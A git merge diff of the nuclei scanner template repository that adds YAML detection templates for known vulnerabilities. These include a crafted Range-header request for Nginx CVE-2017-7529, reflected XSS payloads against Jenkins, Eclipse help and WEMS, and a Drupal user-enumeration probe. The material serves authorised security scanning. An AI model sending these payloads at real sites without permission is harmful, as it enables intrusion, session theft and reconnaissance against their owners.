Merge branch 'master' into master

.github/ISSUE_TEMPLATE/submit-template.md

@@ -0,0 +1,14 @@
+---
+name: Submit Template
+about: Submit nuclei template using issue
+title: "[nuclei-template] "
+labels: ''
+assignees: ''
+
+---
+
+**Template Details**
+
+```
+nuclei template goes here
+```

README.md

@@ -12,10 +12,10 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 <summary>Template Directory</summary>
 
 ```
-├── LICENSE.md
-├── README.md
 ├── cves
 │   ├── CVE-2017-10075.yaml
+│   ├── CVE-2017-14849.yaml
+│   ├── CVE-2017-5638.yaml
 │   ├── CVE-2017-7529.yaml
 │   ├── CVE-2017-9506.yaml
 │   ├── CVE-2017-9841.yaml
@@ -37,7 +37,9 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 │   ├── CVE-2018-5230.yaml
 │   ├── CVE-2018-7490.yaml
 │   ├── CVE-2019-10475.yaml
+│   ├── CVE-2019-11248.yaml
 │   ├── CVE-2019-11510.yaml
+│   ├── CVE-2019-11580.yaml
 │   ├── CVE-2019-12314.yaml
 │   ├── CVE-2019-14322.yaml
 │   ├── CVE-2019-14974.yaml
@@ -51,9 +53,11 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 │   ├── CVE-2019-19908.yaml
 │   ├── CVE-2019-19985.yaml
 │   ├── CVE-2019-2588.yaml
+│   ├── CVE-2019-2725.yaml
 │   ├── CVE-2019-3396.yaml
 │   ├── CVE-2019-3799.yaml
 │   ├── CVE-2019-5418.yaml
+│   ├── CVE-2019-6112.yaml
 │   ├── CVE-2019-7609.yaml
 │   ├── CVE-2019-8449.yaml
 │   ├── CVE-2019-8451.yaml
@@ -66,6 +70,8 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 │   ├── CVE-2020-12720.yaml
 │   ├── CVE-2020-13167.yaml
 │   ├── CVE-2020-13379.yaml
+│   ├── CVE-2020-17505.yaml
+│   ├── CVE-2020-17506.yaml
 │   ├── CVE-2020-2096.yaml
 │   ├── CVE-2020-3187.yaml
 │   ├── CVE-2020-3452.yaml
@@ -78,12 +84,14 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 │   ├── CVE-2020-7961.yaml
 │   ├── CVE-2020-8091.yaml
 │   ├── CVE-2020-8115.yaml
+│   ├── CVE-2020-8163.yaml
 │   ├── CVE-2020-8191.yaml
 │   ├── CVE-2020-8193.yaml
 │   ├── CVE-2020-8194.yaml
 │   ├── CVE-2020-8512.yaml
 │   ├── CVE-2020-8982.yaml
 │   ├── CVE-2020-9484.yaml
+│   ├── CVE-2020-9496.yaml
 │   └── CVE-2020-9757.yaml
 ├── default-credentials
 │   ├── grafana-default-credential.yaml
@@ -97,10 +105,11 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 ├── files
 │   ├── apc-info.yaml
 │   ├── cgi-test-page.yaml
-│   ├── debug-pprof.yaml
 │   ├── dir-listing.yaml
 │   ├── docker-registry.yaml
+│   ├── druid-monitor.yaml
 │   ├── drupal-install.yaml
+│   ├── ds_store.yaml
 │   ├── elasticsearch.yaml
 │   ├── exposed-kibana.yaml
 │   ├── exposed-svn.yaml
@@ -144,6 +153,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 │   ├── kubernetes-pods.yaml
 │   ├── mongo-express-web-gui.yaml
 │   ├── parallels-html-client.yaml
+│   ├── pfsense-web-gui.yaml
 │   ├── phpmyadmin-panel.yaml
 │   ├── pulse-secure-panel.yaml
 │   ├── rabbitmq-dashboard.yaml
@@ -153,8 +163,10 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 │   ├── supervpn-panel.yaml
 │   ├── swagger-panel.yaml
 │   ├── tikiwiki-cms.yaml
+│   ├── traefik-dashboard
 │   ├── weave-scope-dashboard-detect.yaml
-│   └── webeditors.yaml
+│   ├── webeditors.yaml
+│   └── workspaceone-uem-airWatch-dashboard-detect.yaml
 ├── payloads
 │   └── CVE-2020-6287.xml
 ├── security-misconfiguration
@@ -166,6 +178,8 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 │   ├── jira-unauthenticated-popular-filters.yaml
 │   ├── jira-unauthenticated-projects.yaml
 │   ├── jira-unauthenticated-user-picker.yaml
+│   ├── missing-x-frame-options.yaml
+│   ├── put-method-enabled.yaml
 │   ├── rack-mini-profiler.yaml
 │   ├── springboot-detect.yaml
 │   ├── wamp-xdebug-detect.yaml
@@ -174,10 +188,12 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 │   ├── detect-all-takeovers.yaml
 │   └── s3-subtakeover.yaml
 ├── technologies
+│   ├── artica-web-proxy-detect.yaml
 │   ├── bigip-config-utility-detect.yaml
 │   ├── citrix-vpn-detect.yaml
 │   ├── clockwork-php-page.yaml
 │   ├── couchdb-detect.yaml
+│   ├── favicon-detection.yaml
 │   ├── github-enterprise-detect.yaml
 │   ├── gitlab-detect.yaml
 │   ├── graphql.yaml
@@ -188,7 +204,6 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 │   ├── linkerd-badrule-detect.yaml
 │   ├── linkerd-ssrf-detect.yaml
 │   ├── netsweeper-webadmin-detect.yaml
-│   ├── ntlm-directories.yaml
 │   ├── prometheus-exposed-panel.yaml
 │   ├── s3-detect.yaml
 │   ├── sap-netweaver-as-java-detect.yaml
@@ -200,6 +215,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 ├── tokens
 │   ├── amazon-mws-auth-token-value.yaml
 │   ├── aws-access-key-value.yaml
+│   ├── credentials-disclosure.yaml
 │   ├── google-api-key.yaml
 │   ├── http-username-password.yaml
 │   ├── mailchimp-api-key.yaml
@@ -209,6 +225,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 │   ├── couchdb-adminparty.yaml
 │   ├── crlf-injection.yaml
 │   ├── discourse-xss.yaml
+│   ├── eclipse-help-system-xss.yaml
 │   ├── git-config-nginxoffbyslash.yaml
 │   ├── ibm-infoprint-directory-traversal.yaml
 │   ├── microstrategy-ssrf.yaml
@@ -220,16 +237,20 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 │   ├── pdf-signer-ssti-to-rce.yaml
 │   ├── rce-shellshock-user-agent.yaml
 │   ├── rce-via-java-deserialization.yaml
+│   ├── sick-beard-xss.yaml
 │   ├── springboot-actuators-jolokia-xxe.yaml
 │   ├── symfony-debugmode.yaml
 │   ├── tikiwiki-reflected-xss.yaml
 │   ├── tomcat-manager-pathnormalization.yaml
 │   ├── twig-php-ssti.yaml
+│   ├── wems-manager-xss.yaml
 │   ├── wordpress-duplicator-path-traversal.yaml
 │   ├── wordpress-wordfence-xss.yaml
 │   └── x-forwarded-host-injection.yaml
 └── workflows
+    ├── artica-web-proxy-workflow.yaml
     ├── bigip-pwner-workflow.yaml
+    ├── cisco-asa-workflow.yaml
     ├── grafana-workflow.yaml
     ├── jira-exploitaiton-workflow.yaml
     ├── liferay-rce-workflow.yaml
@@ -243,7 +264,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n
 
 </details>
 
-13 directories, **214 templates**. 
+13 directories, **235 templates**. 
 
 Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
 

cves/CVE-2017-7529.yaml

@@ -0,0 +1,31 @@
+id: CVE-2017-7529
+info:
+  author: "Harsh Bothra & @dwisiswant0"
+  name: "Nginx Remote Integer Overflow"
+  severity: medium
+  description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
+
+  # This template supports the detection part only.
+  # Do not test any website without permission
+  # https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Range: bytes=-17208,-9223372036854758792
+        Connection: close
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 206
+      - type: word
+        words:
+          - "Server: nginx"
+          - "Content-Range"
+        condition: and
+        part: header

cves/CVE-2017-9841.yaml

@@ -3,7 +3,7 @@ id: CVE-2017-9841
 info:
   name: CVE-2017-9841
   author: Random-Robbie
-  severity: High
+  severity: high
   description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
   # Reference to exploit
   # https://github.com/cyberharsh/Php-unit-CVE-2017-9841

cves/CVE-2018-1271.yaml

@@ -3,7 +3,7 @@ id: CVE-2018-1271
 info:
   name: Spring MVC Directory Traversal Vulnerability
   author: hetroublemakr
-  severity: High
+  severity: high
   # reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
 
 requests:

cves/CVE-2019-17382.yaml

@@ -3,7 +3,7 @@ id: CVE-2019-17382
 info:
   name: Zabbix Authentication Bypass
   author: Harsh Bothra
-  severity: Critical
+  severity: critical
   # source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
 
 requests:

cves/CVE-2019-3396.yaml

@@ -2,7 +2,7 @@ id: CVE-2019-3396
 info:
   author: "Harsh Bothra"
   name: "Atlassian Confluence Path Traversal"
-  severity: High
+  severity: high
 
 # https://github.com/x-f1v3/CVE-2019-3396
 

cves/CVE-2020-2140.yaml

@@ -0,0 +1,25 @@
+id: CVE-2020-2140
+info:
+  author: j3ssie/geraldino2
+  name: Jenkin AuditTrailPlugin XSS
+  severity: medium
+  description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
+
+  # Source:- https://nvd.nist.gov/vuln/detail/CVE-2020-2140
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j<h1>sample"
+      - "{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j<h1>sample"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - <h1>sample
+        part: body
+
+      - type: status
+        status:
+          - 200

cves/CVE-2020-3187.yaml

@@ -5,7 +5,7 @@ id: CVE-2020-3187
 info:
   name: CVE-2020-3187
   author: KareemSe1im
-  severity: High
+  severity: high
 
 requests:
   - method: GET

cves/CVE-2020-5405.yaml

@@ -3,7 +3,7 @@ id: CVE-2020-5405
 info:
   name: Spring Cloud Directory Traversal
   author: Harsh Bothra
-  severity: High
+  severity: high
 
 # source:- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
 

default-credentials/rabbitmq-default-admin.yaml

@@ -3,7 +3,7 @@ id: rabbitmq-default-admin
 info:
   name: RabbitMQ Default Credentials
   author: fyoorer & dwisiswant0
-  severity: High
+  severity: high
 
 requests:
   - method: GET

files/robots.txt.yaml

@@ -0,0 +1,24 @@
+id: robots-txt
+info:
+  name: robots.txt file
+  author: CasperGN
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/robots.txt"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Disallow:"
+
+      - type: word
+        words:
+          - text/plain
+        part: header
+
+      - type: status
+        status:
+          - 200

files/wordpress-debug-log.yaml

@@ -0,0 +1,26 @@
+id: wp-debug-log
+
+info:
+  name: WordPress debug log
+  author: geraldino2 & @dwisiswant0
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/debug.log"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - octet-stream
+          - text/plain
+        part: header
+        condition: or
+      - type: regex
+        regex:
+          - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP"
+        part: body
+      - type: status
+        status:
+          - 200

files/wordpress-directory-listing.yaml

@@ -9,6 +9,9 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/wp-content/uploads/"
+      - "{{BaseURL}}/wp-content/themes/"
+      - "{{BaseURL}}/wp-content/plugins/"
+      - "{{BaseURL}}/wp-includes/"
     matchers-condition: and
     matchers:
       - type: status
@@ -16,4 +19,4 @@ requests:
           - 200
       - type: word
         words:
-          - Index of /wp-content/uploads
+          - Index of /

panels/jmx-console.yaml

@@ -2,7 +2,7 @@ id: jmx-console
 info:
   name: JMX Console
   author: Yash Anand @yashanand155
-  severity: Low
+  severity: low
 requests:
   - method: GET
     path:

panels/mongo-express-web-gui.yaml

@@ -1,16 +0,0 @@
-id: mongo-express-web-gui
-
-info:
-  name: Mongo Express Web GUI
-  author: puzzlepeaches
-  severity: info
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/"
-    matchers:
-      - type: word
-        words:
-          - "Set-Cookie: mongo-express="
-        part: header

panels/pfsense-web-gui.yaml

@@ -1,16 +0,0 @@
-id: pfsense-web-gui
-
-info:
-  name: pfSense Web GUI
-  author: ossie
-  severity: info
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/"
-
-    matchers:
-      - type: word
-        words:
-          - "Login to pfSense"

panels/weave-scope-dashboard-detect.yaml

@@ -1,20 +0,0 @@
-id: weave-scope-dashboard-detect
-
-info:
-  name: Weave Scope Dashboard
-  author: e_schultze_
-  severity: info
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers:
-      - type: word
-        words:
-          - "<title>Weave Scope</title>"
-          - "__WEAVEWORKS_CSRF_TOKEN"
-          - "__CSRF_TOKEN_PLACEHOLDER__"
-        condition: and
-        part: body

panels/workspaceone-uem-airwatch-dashboard-detect.yaml

@@ -1,4 +1,4 @@
-id: workspaceone-uem-airWatch-dashboard-detect
+id: workspaceone-uem-airwatch-dashboard-detect
 
 info:
   name: Workspace ONE Unified Endpoint Management (UEM) AirWatch

security-misconfiguration/drupal-user-enum-redirect.yaml

@@ -0,0 +1,30 @@
+id: drupal-user-enum-redirect
+
+info:
+  name: Drupal User Enumration [Redirect]
+  author: 0w4ys
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/user/0"
+      - "{{BaseURL}}/user/1"
+      - "{{BaseURL}}/user/2"
+      - "{{BaseURL}}/user/3"
+    headers:
+      User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '(?i)Location: http(s|):\/\/[\w\.\-]+(\/ar|\/en|)\/users\/\w+'
+        part: header
+      - type: status
+        status:
+          - 301
+    extractors:
+      - type: regex
+        part: header
+        regex:
+          - 'users\/\w+'

security-misconfiguration/jira-unauthenticated-user-picker.yaml

@@ -3,7 +3,7 @@ id: jira-unauthenticated-user-picker
 info:
   name: Jira Unauthenticated User Picker
   author: TechbrunchFR
-  severity: High
+  severity: high
 
 requests:
   - method: GET

technologies/favicon-detection.yaml

@@ -14,8 +14,11 @@ info:
   # 17542,e16377344d2d52a15e735041b3eb2c5a,jenkins
   # 1150,6d2adf39ca320265830403dfc030033a,liferay
   # 3638,59a0c7b6e4848ccdabcea0636efda02b,blogger
-  # 198,59a0c7b6e4848ccdabcea0636efda02b,wordpress
-  # 5430,59a0c7b6e4848ccdabcea0636efda02b,wordpress
+  # 198,c6acedaff906029fc5455d9ec52c7f42,wordpress
+  # 5430,c291c057816f71ce15ba5c496f1a965a,wordpress
+  # 1611,f7e3d97f404e71d302b3239eef48d5f2,gitlab
+  # 6093,88717398db158e3330ce94fc1784e4a7,jira
+  # 2494,88717398db158e3330ce94fc1784e4a7,jira
 
 requests:
   - method: GET
@@ -69,3 +72,19 @@ requests:
         name: wordpress
         dsl:
           - "len(body)==5430 && status_code==200 && (\"c291c057816f71ce15ba5c496f1a965a\" == md5(body))"
+      - type: dsl
+        name: gitlab
+        dsl:
+          - "len(body)==1611 && status_code==200 && (\"f7e3d97f404e71d302b3239eef48d5f2\" == md5(body))"
+      - type: dsl
+        name: jira
+        dsl:
+          - "len(body)==6093 && status_code==200 && (\"88717398db158e3330ce94fc1784e4a7\" == md5(body))"
+      - type: dsl
+        name: jira
+        dsl:
+          - "len(body)==2494 && status_code==200 && (\"04d89d5b7a290334f5ce37c7e8b6a349\" == md5(body))"
+      - type: dsl
+        name: confluence
+        dsl:
+          - "len(body)==4259 && status_code==200 && (\"966e60f8eb85b7ea43a7b0095f3e2336\" == md5(body))"

technologies/github-enterprise-detect.yaml

@@ -1,4 +1,4 @@
-id: Github-Enterprise-Detect
+id: github-enterprise-detect
 
 info:
   name: Detect Github Enterprise

technologies/gitlab-detect.yaml

@@ -1,4 +1,4 @@
-id: Gitlab-Detect
+id: gitlab-detect
 
 info:
   name: Detect Gitlab

technologies/jaspersoft-detect.yaml

@@ -1,4 +1,4 @@
-id: Jaspersoft-detect
+id: jaspersoft-detect
 
 info:
   name: Jaspersoft detected

technologies/sap-netweaver-detect.yaml

@@ -1,4 +1,4 @@
-id: SAP-Netweaver-Detect
+id: sap-netweaver-detect
 info:
   name: SAP NetWeaver Detect
   author: rakeshmane10

technologies/tech-detect.yaml

@@ -2688,4 +2688,30 @@ requests:
         words:
           - "/etc/clientlibs/"
           - "/content/dam/"
-        part: body
+        part: body
+
+      - type: word
+        name: lotus-domino
+        words:
+          - "Server: Lotus-Domino"
+        part: header
+
+      - type: word
+        name: mongo-express-web-gui
+        words:
+          - "Set-Cookie: mongo-express="
+        part: header
+
+      - type: word
+        name: pf-sense-ui
+        words:
+          - "Login to pfSense"
+
+      - type: word
+        name: weave-scope-dashboard
+        words:
+          - "<title>Weave Scope</title>"
+          - "__WEAVEWORKS_CSRF_TOKEN"
+          - "__CSRF_TOKEN_PLACEHOLDER__"
+        condition: and
+        part: body

technologies/weblogic-detect.yaml

@@ -1,4 +1,4 @@
-id: WebLogic-Detect
+id: weblogic-detect
 
 info:
   name: Detect Weblogic

vulnerabilities/discourse-xss.yaml

@@ -1,4 +1,4 @@
-id: Discourse XSS
+id: discourse-xss
 
 info:
   name: Discourse CMS - XSS

vulnerabilities/eclipse-help-system-xss.yaml

@@ -0,0 +1,22 @@
+id: eclipse-help-system-xss
+
+info:
+  name: Eclipse Help System RXSS vulnerability
+  author: pikpikcu
+  severity: medium
+
+  # Source:- https://github.com/pikpikcu/nuclei-templates/blob/master/vulnerabilities/eclipse-xss.yaml
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/help/index.jsp?view=<script>alert(document.cookie)</script>"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "<script>alert(document.cookie)</script>"
+        part: body

vulnerabilities/ibm-infoprint-directory-traversal.yaml

@@ -1,4 +1,4 @@
-id: IBM InfoPrint Directory Traversal
+id: ibm-infoprint-directory-traversal
 
 info:
   name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal

vulnerabilities/oracle-ebs-bispgraph-file-access.yaml

@@ -3,7 +3,7 @@ id: oracle-ebs-bispgrapgh-file-read
 info:
   name: Oracle EBS Bispgraph File Access
   author: "Alfie Njeru (@emenalf) - https://the-infosec.com"
-  severity: Critical
+  severity: critical
   description: todo
 
 requests:

vulnerabilities/wems-manager-xss.yaml

@@ -0,0 +1,24 @@
+id: wems-manager-xss
+
+info:
+  name: WEMS Enterprise Manager XSS
+  author: pikpikcu
+  severity: medium
+
+  # Source
+  # https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
+  # https://github.com/pikpikcu/nuclei-templates/blob/master/vulnerabilities/wems-enterprise-xss.yaml
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/guest/users/forgotten?email="><script>confirm(document.domain)</script>'
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - '"><script>confirm(document.domain)</script>'
+        part: body

vulnerabilities/wordpress-wordfence-xss.yaml

@@ -13,4 +13,4 @@ requests:
       - type: word
         words:
           - "<svg/onload=alert(1337)>"
-        part: body
+        part: body

workflows/wordpress-workflow.yaml

@@ -11,6 +11,7 @@ variables:
   wordpress_duplicator_path_traversal: vulnerabilities/wordpress-duplicator-path-traversal.yaml
   wordpress_wordfence_xss: vulnerabilities/wordpress-wordfence-xss.yaml
   wordpress_cve_1: cves/CVE-2019-9978.yaml
+  wordpress_debug_log: files/wordpress-debug-log.yaml
 
 logic: |
   wordpress_tech()
@@ -23,4 +24,5 @@ logic: |
     wordpress_duplicator_path_traversal()
     wordpress_wordfence_xss()
     wordpress_cve_1()
+    wordpress_debug_log()
   }